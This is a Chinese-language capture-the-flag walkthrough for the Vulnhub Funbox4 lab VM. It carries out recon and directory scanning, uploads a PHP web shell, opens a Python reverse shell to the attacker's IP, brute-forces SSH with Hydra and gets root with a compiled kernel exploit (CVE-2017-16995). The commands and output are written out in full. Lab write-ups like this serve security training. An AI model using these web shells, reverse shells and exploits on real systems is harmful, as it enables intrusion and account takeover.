发布时间:2025-12-10 19:28:34 浏览次数:23
靶机渗透练习25-Funbox4-CTF靶机描述靶机地址:https://www.vulnhub.com/entry/funbox-ctf,546/DescriptionGroundhogDay:Boot2Root!Initialfootstepisabitflowed,butreallynotdifficult.AftergettingaccesstoFunbox:CTF,itsnessesarrytofind,readandunderstandthe(2andeasyto_funbox4靶机
靶机地址:https://www.vulnhub.com/entry/funbox-ctf,546/
Description
Groundhog Day: Boot2Root !
Initial footstep is a bit flowed, but really not difficult.
After getting access to Funbox: CTF, its nessesarry to find, read and understand the (2 and easy to find) hints.
Be smart and combine…
Hints: Nikto scans “case sensitive” and you need a minimum of 15 mins to get user !
If you need hints, call me on twitter: @0815R2d2
Have fun…
This works better with VirtualBox rather than VMware
This works better with VirtualBox rather than VMware
攻击机Kali:
IP地址:192.168.9.7
靶机:
IP地址:192.168.9.43
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
arp-scan -I eth0 -l
☁ kali arp-scan -I eth0 -lInterface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)192.168.9.2 08:00:27:c7:72:ce PCS Systemtechnik GmbH192.168.9.43 08:00:27:95:e3:7b PCS Systemtechnik GmbH2 packets received by filter, 0 packets dropped by kernelEnding arp-scan 1.9.7: 256 hosts scanned in 1.936 seconds (132.23 hosts/sec). 2 responded☁ kali 希望我今天分享的这篇文章可以帮到您。
masscan 192.168.184.0/24 -p 80,22
netdiscover -i eth0 -r 192.168.184.0/24
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
☁ kali nmap -A -sV -T4 -p- 192.168.9.43Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-15 10:48 CSTNmap scan report for bogon (192.168.9.43)Host is up (0.00036s latency).Not shown: 65531 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 f6:b3:8f:f1:e3:b7:6c:18:ee:31:22:d3:d4:c9:5f:e6 (RSA)| 256 45:c2:16:fc:3e:a9:fc:32:fc:36:fb:d7:ce:4f:2b:fe (ECDSA)|_ 256 4f:f8:46:72:22:9f:d3:10:51:9c:49:e0:76:5f:25:33 (ED25519)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-title: Apache2 Ubuntu Default Page: It works|_http-server-header: Apache/2.4.18 (Ubuntu)110/tcp open pop3 Dovecot pop3d|_pop3-capabilities: RESP-CODES TOP PIPELINING UIDL SASL CAPA AUTH-RESP-CODE143/tcp open imap Dovecot imapd|_imap-capabilities: Pre-login IDLE more listed SASL-IR IMAP4rev1 LOGINDISABLEDA0001 capabilities LITERAL+ ENABLE post-login ID OK LOGIN-REFERRALS haveMAC Address: 08:00:27:95:E3:7B (Oracle VirtualBox virtual NIC)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT ADDRESS1 0.36 ms bogon (192.168.9.43)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 10.42 seconds开放了一下端口
22—ssh—OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80—http–Apache httpd 2.4.18 ((Ubuntu))
110—pop3—Dovecot pop3d
143—pop3—Dovecot imapd
一般只能暴力激活成功教程,暂时没有合适的字典
访问 80 端口
查看源代码,没什么发现
扫描一下目录
gobuster dir -u http://192.168.9.43/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt
☁ kali gobuster dir -u http://192.168.9.43/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt===============================================================Gobuster v3.1.0by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://192.168.9.43/[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/dirb/common.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.1.0[+] Extensions: txt,php,html,zip,bak[+] Timeout: 10s===============================================================2022/03/15 10:55:58 Starting gobuster in directory enumeration mode===============================================================/.hta.zip (Status: 403) [Size: 295]/.hta.bak (Status: 403) [Size: 295]/.hta (Status: 403) [Size: 291]/.htaccess (Status: 403) [Size: 296]/.hta.txt (Status: 403) [Size: 295]/.htaccess.html (Status: 403) [Size: 301]/.htpasswd (Status: 403) [Size: 296]/.hta.php (Status: 403) [Size: 295]/.htaccess.zip (Status: 403) [Size: 300]/.htpasswd.zip (Status: 403) [Size: 300]/.htaccess.bak (Status: 403) [Size: 300]/.hta.html (Status: 403) [Size: 296]/.htaccess.txt (Status: 403) [Size: 300]/.htpasswd.bak (Status: 403) [Size: 300]/.htaccess.php (Status: 403) [Size: 300]/.htpasswd.txt (Status: 403) [Size: 300]/.htpasswd.php (Status: 403) [Size: 300]/.htpasswd.html (Status: 403) [Size: 301]/index.html (Status: 200) [Size: 11321]/index.html (Status: 200) [Size: 11321]/server-status (Status: 403) [Size: 300] ===============================================================2022/03/15 10:56:00 Finished===============================================================☁ kali 无发现,换个大一点的字典看看
☁ kali gobuster dir -u http://192.168.9.43/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/big.txt ===============================================================Gobuster v3.1.0by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://192.168.9.43/[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/dirb/big.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.1.0[+] Extensions: txt,php,html,zip,bak[+] Timeout: 10s===============================================================2022/03/15 11:03:52 Starting gobuster in directory enumeration mode===============================================================/.htpasswd (Status: 403) [Size: 296]/.htaccess.bak (Status: 403) [Size: 300]/.htpasswd.html (Status: 403) [Size: 301]/.htaccess.txt (Status: 403) [Size: 300]/.htpasswd.zip (Status: 403) [Size: 300]/.htaccess.php (Status: 403) [Size: 300]/.htpasswd.bak (Status: 403) [Size: 300]/.htpasswd.txt (Status: 403) [Size: 300]/.htaccess (Status: 403) [Size: 296]/.htpasswd.php (Status: 403) [Size: 300]/.htaccess.html (Status: 403) [Size: 301]/.htaccess.zip (Status: 403) [Size: 300]/index.html (Status: 200) [Size: 11321]/server-status (Status: 403) [Size: 300] ===============================================================2022/03/15 11:04:00 Finished===============================================================☁ kali 尝试大小写再扫一下
☁ kali dirsearch -u http://192.168.9.43/ -e html,php,txt,bak,zip -w /usr/share/wordlists/dirb/common.txt --uppercase -f_|. _ _ _ _ _ _|_ v0.4.2(_||| _) (/_(_|| (_| )Extensions: html, php, txt, bak, zip | HTTP method: GET | Threads: 30 | Wordlist size: 31784Output File: /root/.dirsearch/reports/192.168.9.43/-_22-03-15_11-10-21.txtError Log: /root/.dirsearch/logs/errors-22-03-15_11-10-21.logTarget: http://192.168.9.43/[11:10:21] Starting: [11:11:11] 200 - 273B - /ROBOTS.TXT访问:http://192.168.9.43/ROBOTS.TXT
访问:http://192.168.9.43/upload/
访问:view-source:http://192.168.9.43/ROBOTS.TXT
下拉发现
Disallow: igmseklhgmrjmtherij2145236根据页面拼接一下url试试
访问:http://192.168.9.43/upload/igmseklhgmrjmtherij2145236
该链接无法访问
访问:http://192.168.9.43/igmseklhgmrjmtherij2145236/upload/
该链接无法访问
恩,,,想当然了,扫描一下目录
☁ kali dirsearch -u http://192.168.9.43/upload -e html,php,txt,bak,zip -w /usr/share/wordlists/dirb/common.txt -f_|. _ _ _ _ _ _|_ v0.4.2(_||| _) (/_(_|| (_| )Extensions: html, php, txt, bak, zip | HTTP method: GET | Threads: 30 | Wordlist size: 31784Output File: /root/.dirsearch/reports/192.168.9.43/-upload_22-03-15_11-27-07.txtError Log: /root/.dirsearch/logs/errors-22-03-15_11-27-07.logTarget: http://192.168.9.43/upload/[11:27:07] Starting: Task Completed换一个
☁ kali dirsearch -u http://192.168.9.43/igmseklhgmrjmtherij2145236 -e html,php,txt,bak,zip -w /usr/share/wordlists/dirb/common.txt -f_|. _ _ _ _ _ _|_ v0.4.2(_||| _) (/_(_|| (_| )Extensions: html, php, txt, bak, zip | HTTP method: GET | Threads: 30 | Wordlist size: 31784Output File: /root/.dirsearch/reports/192.168.9.43/-igmseklhgmrjmtherij2145236_22-03-15_11-25-26.txtError Log: /root/.dirsearch/logs/errors-22-03-15_11-25-26.logTarget: http://192.168.9.43/igmseklhgmrjmtherij2145236/[11:25:26] Starting: [11:26:31] 200 - 297B - /igmseklhgmrjmtherij2145236/upload.html[11:26:31] 200 - 319B - /igmseklhgmrjmtherij2145236/upload.php[11:26:31] 403 - 321B - /igmseklhgmrjmtherij2145236/upload/[11:26:31] 301 - 340B - /igmseklhgmrjmtherij2145236/upload -> http://192.168.9.43/igmseklhgmrjmtherij2145236/upload/Task Completed原来,,,,
访问:http://192.168.9.43/igmseklhgmrjmtherij2145236/upload.php
上传shell.php,上传成功
<?php echo "Shell";system($_GET['cmd']); ?>访问:http://192.168.9.43/igmseklhgmrjmtherij2145236/upload/shell.php
测试一下命令执行:http://192.168.9.43/igmseklhgmrjmtherij2145236/upload/shell.php?cmd=whoami
本地开启nc监听:nc -lvp 443
查看是否有python,使用python反弹shell
which python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.9.7",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'成功拿到shell
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ ididuid=33(www-data) gid=33(www-data) groups=33(www-data)www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ ls -al /home<tml/igmseklhgmrjmtherij2145236/upload$ ls -al /home total 16drwxr-xr-x 4 root root 4096 Aug 29 2020 .drwxr-xr-x 23 root root 4096 Mar 14 08:40 ..drwx------ 4 anna anna 4096 Aug 30 2020 annadrwxr-xr-x 4 thomas thomas 4096 Aug 30 2020 thomaswww-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ cd /home/anna<tml/igmseklhgmrjmtherij2145236/upload$ cd /home/anna bash: cd: /home/anna: Permission deniedwww-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ cd /home/thomas<tml/igmseklhgmrjmtherij2145236/upload$ cd /home/thomas www-data@funbox4:/home/thomas$ ls -alls -altotal 3052drwxr-xr-x 4 thomas thomas 4096 Aug 30 2020 .drwxr-xr-x 4 root root 4096 Aug 29 2020 ..-rw------- 1 thomas thomas 46 Aug 30 2020 .bash_history-rw-r--r-- 1 thomas thomas 220 Aug 29 2020 .bash_logout-rw-r--r-- 1 thomas thomas 3771 Aug 29 2020 .bashrcdrwx------ 2 thomas thomas 4096 Aug 29 2020 .cache-rw-r--r-- 1 thomas thomas 675 Aug 29 2020 .profiledrwx------ 2 thomas thomas 4096 Aug 30 2020 .ssh-rw-r--r-- 1 thomas thomas 195 Aug 29 2020 .todo-rw------- 1 thomas thomas 1304 Aug 30 2020 .viminfo-rw-rw-r-- 1 thomas thomas 217 Aug 30 2020 .wget-hsts-rwx------ 1 thomas thomas 3078592 Aug 22 2019 pspy64www-data@funbox4:/home/thomas$ cat .bash_historycat .bash_historycat: .bash_history: Permission deniedwww-data@funbox4:/home/thomas$ ./pspy64 ./pspy64bash: ./pspy64: Permission deniedwww-data@funbox4:/home/thomas$ cat .viminfocat .viminfocat: .viminfo: Permission deniedwww-data@funbox4:/home/thomas$ cat .todocat .todo1. make coffee2. check backup3. buy ram4. call simone5. check my mails6. call lucas7. add an exclamation mark to my passwords......100. learn to read emails without a gui-client !!!www-data@funbox4:/home/thomas$ cat .wget-hstscat .wget-hsts# HSTS 1.0 Known Hosts database for GNU Wget.# Edit at your own risk.# <hostname>[:<port>] <incl. subdomains> <created> <max-age>raw.githubusercontent.com 0 0 1598788938 31536000github.com 0 1 1598788977 31536000www-data@funbox4:/home/thomas$ 在最后的提示中发现,密码末尾是感叹号
将本地字典中带感叹号的密码提取出来
cat /usr/share/wordlists/rockyou.txt | sed 's/$/!/g' > wordlist
使用hydra进行激活成功教程hydra -l thomas -P wordlist ssh://192.168.9.43 -t 4
☁ FunBox4 hydra -l thomas -P wordlist ssh://192.168.9.43 -t 4Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-15 15:15:32[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344876 login tries (l:1/p:14344876), ~3586219 tries per task[DATA] attacking ssh://192.168.9.43:22/[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344832 to do in 5433:39h, 4 active[STATUS] 34.33 tries/min, 103 tries in 00:03h, 14344773 to do in 6963:29h, 4 active[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344672 to do in 8203:40h, 4 active[STATUS] 29.60 tries/min, 444 tries in 00:15h, 14344432 to do in 8076:50h, 4 active[22][ssh] host: 192.168.9.43 login: thomas password: thebest!1 of 1 target successfully completed, 1 valid password foundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-15 15:45:05成功获取账号密码:thomas/thebest!
登陆SSH:ssh thomas@192.168.9.43
☁ FunBox4 ssh thomas@192.168.9.43The authenticity of host '192.168.9.43 (192.168.9.43)' can't be established. ED25519 key fingerprint is SHA256:leXWAQi41mdgTrDRpU9czEhIlC3wU4nrwaFkbOthtH0. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.9.43' (ED25519) to the list of known hosts. thomas@192.168.9.43's password: Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-21-generic x86_64)* Documentation: https://help.ubuntu.com/133 packages can be updated.5 updates are security updates.*** System restart required ***Last login: Sun Aug 30 14:55:47 2020 from 192.168.178.143thomas@funbox4:~$ 成功登录进去
由于目标机器没有wget命令,所以在本地使用scp命令拷贝文件:
☁ FunBox4 scp linpeas.sh thomas@192.168.9.43:/tmp/ thomas@192.168.9.43's password: linpeas.sh 100% 745KB 27.2MB/s 00:00 修改权限,运行程序,没有发现什么太有价值的敏感信息
thomas@funbox4:~$ ls /tmp/linpeas.sh systemd-private-1495159d9cfc44648ffa307a1cfa546a-dovecot.service-lWW9s3 systemd-private-1495159d9cfc44648ffa307a1cfa546a-systemd-timesyncd.service-Pe6Ngdthomas@funbox4:~$ chmod 777 /tmp/linpeas.shthomas@funbox4:~$ ls -al /tmp/linpeas.sh-rwxrwxrwx 1 thomas thomas 762836 Mar 14 12:38 /tmp/linpeas.shthomas@funbox4:~$ 拷贝查询漏洞的程序
☁ FunBox4 scp linux-exploit-suggester.sh thomas@192.168.9.43:/tmp/thomas@192.168.9.43's password: linux-exploit-suggester.sh 100% 87KB 55.8MB/s 00:00 ☁ FunBox4 运行该程序
thomas@funbox4:~$ chmod 777 /tmp/linux-exploit-suggester.shthomas@funbox4:~$ bash /tmp/linux-exploit-suggester.shAvailable information:Kernel version: 4.4.0Architecture: x86_64Distribution: ubuntuDistribution version: 16.04Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performedPackage listing: from current OSSearching among:78 kernel space exploits49 user space exploitsPossible Exploits:[+] [CVE-2016-5195] dirtycow 2Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetailsExposure: highly probableTags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{ kernel:2.6.32-21-generic},[ ubuntu=16.04{ kernel:4.4.0-21-generic} ]Download URL: https://www.exploit-db.com/download/40839ext-url: https://www.exploit-db.com/download/40847Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh[+] [CVE-2017-16995] eBPF_verifierDetails: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.htmlExposure: highly probableTags: debian=9.0{ kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{ kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{ kernel:4.(8|10).0-(19|28|45)-generic}Download URL: https://www.exploit-db.com/download/45010Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1[+] [CVE-2016-8655] chocobo_rootDetails: http://www.openwall.com/lists/oss-security/2016/12/06/1Exposure: highly probableTags: [ ubuntu=(14.04|16.04){ kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]Download URL: https://www.exploit-db.com/download/40871Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled[+] [CVE-2016-5195] dirtycowDetails: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetailsExposure: highly probableTags: debian=7|8,RHEL=5{ kernel:2.6.(18|24|33)-*},RHEL=6{ kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{ kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]Download URL: https://www.exploit-db.com/download/40611Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh[+] [CVE-2016-4557] double-fdput()Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=808Exposure: highly probableTags: [ ubuntu=16.04{ kernel:4.4.0-21-generic} ]Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zipComments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1[+] [CVE-2021-4034] PwnKitDetails: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txtExposure: probableTags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaroDownload URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main[+] [CVE-2021-3156] sudo Baron Samedit 2Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txtExposure: probableTags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main[+] [CVE-2017-7308] af_packetDetails: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.htmlExposure: probableTags: [ ubuntu=16.04 ]{ kernel:4.8.0-(34|36|39|41|42|44|45)-generic}Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.cext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.cComments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels[+] [CVE-2017-6074] dccpDetails: http://www.openwall.com/lists/oss-security/2017/02/22/3Exposure: probableTags: [ ubuntu=(14.04|16.04) ]{ kernel:4.4.0-62-generic}Download URL: https://www.exploit-db.com/download/41458Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass[+] [CVE-2017-1000112] NETIF_F_UFODetails: http://www.openwall.com/lists/oss-security/2017/08/13/1Exposure: probableTags: ubuntu=14.04{ kernel:4.4.0-*},[ ubuntu=16.04 ]{ kernel:4.8.0-*}Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.cext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.cComments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels[+] [CVE-2021-3156] sudo Baron SameditDetails: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txtExposure: less probableTags: mint=19,ubuntu=18|20, debian=10Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main[+] [CVE-2021-22555] Netfilter heap out-of-bounds writeDetails: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.htmlExposure: less probableTags: ubuntu=20.04{ kernel:5.8.0-*}Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.cext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.cComments: ip_tables kernel module must be loaded[+] [CVE-2019-18634] sudo pwfeedbackDetails: https://dylankatz.com/Analysis-of-CVE-2019-18634/Exposure: less probableTags: mint=19Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.cComments: sudo configuration requires pwfeedback to be enabled.[+] [CVE-2019-15666] XFRM_UAFDetails: https://duasynt.com/blog/ubuntu-centos-redhat-privescExposure: less probableDownload URL: Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled[+] [CVE-2018-1000001] RationalLoveDetails: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/Exposure: less probableTags: debian=9{ libc6:2.24-11+deb9u1},ubuntu=16.04.3{ libc6:2.23-0ubuntu9}Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.cComments: kernel.unprivileged_userns_clone=1 required[+] [CVE-2017-5618] setuid screen v4.5.0 LPEDetails: https://seclists.org/oss-sec/2017/q1/184Exposure: less probableDownload URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txtExposure: less probableTags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.cComments: Uses "Stack Clash" technique, works against most SUID-root binaries[+] [CVE-2017-1000253] PIE_stack_corruptionDetails: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txtExposure: less probableTags: RHEL=6,RHEL=7{ kernel:3.10.0-514.21.2|3.10.0-514.26.1}Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c[+] [CVE-2016-9793] SO_{ SND|RCV}BUFFORCEDetails: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793Exposure: less probableDownload URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.cComments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only[+] [CVE-2016-2384] usb-midiDetails: https://xairy.github.io/blog/2016/cve-2016-2384Exposure: less probableTags: ubuntu=14.04,fedora=22Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.cComments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user[+] [CVE-2016-0728] keyringDetails: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/Exposure: less probableDownload URL: https://www.exploit-db.com/download/40003Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-workingthomas@funbox4:~$ 发现了很多漏洞,选择一个系统版本(ubuntu 16.04)、内核版本(4.4.0)一致的
本地搜索:
☁ FunBox4 searchsploit -m 45010Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege EscalationURL: https://www.exploit-db.com/exploits/45010Path: /usr/share/exploitdb/exploits/linux/local/45010.cFile Type: C source, ASCII textCopied to: /home/kali/vulnhub/FunBox/FunBox4/45010.c因为也是c语言文件,目标系统不能编译,所以本地编译尝试一下,然后拷贝过去执行
☁ FunBox4 gcc 45010.c -o exp☁ FunBox4 scp exp thomas@192.168.9.43:/tmp/ thomas@192.168.9.43's password: exp 100% 21KB 22.6MB/s 00:00 ☁ FunBox4 在目标系统执行(因为ssh登录进去的shell是rbash,有限制,所以在反弹shell里执行程序):
www-data@funbox4:/tmp$ ./exp./exp[.] [.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)[.] [.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **[.] [*] creating bpf map[*] sneaking evil bpf past the verifier[*] creating socketpair()[*] attaching bpf backdoor to socket[*] skbuff => ffff88003baee900[*] Leaking sock struct from ffff88000f2c2780[*] Sock->sk_rcvtimeo at offset 472[*] Cred structure at ffff880008cb6540[*] UID from cred structure: 33, matches the current: 33[*] hammering cred structure at ffff880008cb6540[*] credentials patched, launching shell...# 成功提权后,找到flag.txt
# ididuid=0(root) gid=0(root) groups=0(root),33(www-data)# cd /rootcd /root# lslsflag.txt# cat flag.txtcat flag.txt( _`\ ( ) ( _`\(_ _)( _`\ | (_(_)_ _ ___ | |_ _ _ | ( (_) | | | (_(_) | _) ( ) ( )/' _ `\| '_`\ /'_`\ (`\/')(_) | | _ | | | _) | | | (_) || ( ) || |_) )( (_) ) > < _ | (_( ) | | | | (_) `\___/'(_) (_)(_,__/'`\___/'(_/\_)(_) (____/' (_) (_) Well done ! Made with ❤ by @0815R2d2 ! I look forward to see this screenshot on twitter ;-)# 本节通过信息收集目录扫描,获取敏感目录,利用文件上传漏洞获取shell,然后利用信息收集获取内核漏洞进行权限提升
发现主机端口扫描目录扫描文件上传漏洞linux-exploit-suggester.sh、linpeas.sh的使用内核漏洞提权–CVE-2017-16995利用
免责声明:本站内容(文字信息+图片素材)来源于互联网公开数据整理或转载,仅用于学习参考,如有侵权问题,请及时联系本站删除,我们将在5个工作日内处理。联系邮箱:303555158#qq.com(把#换成@)
微信便捷交流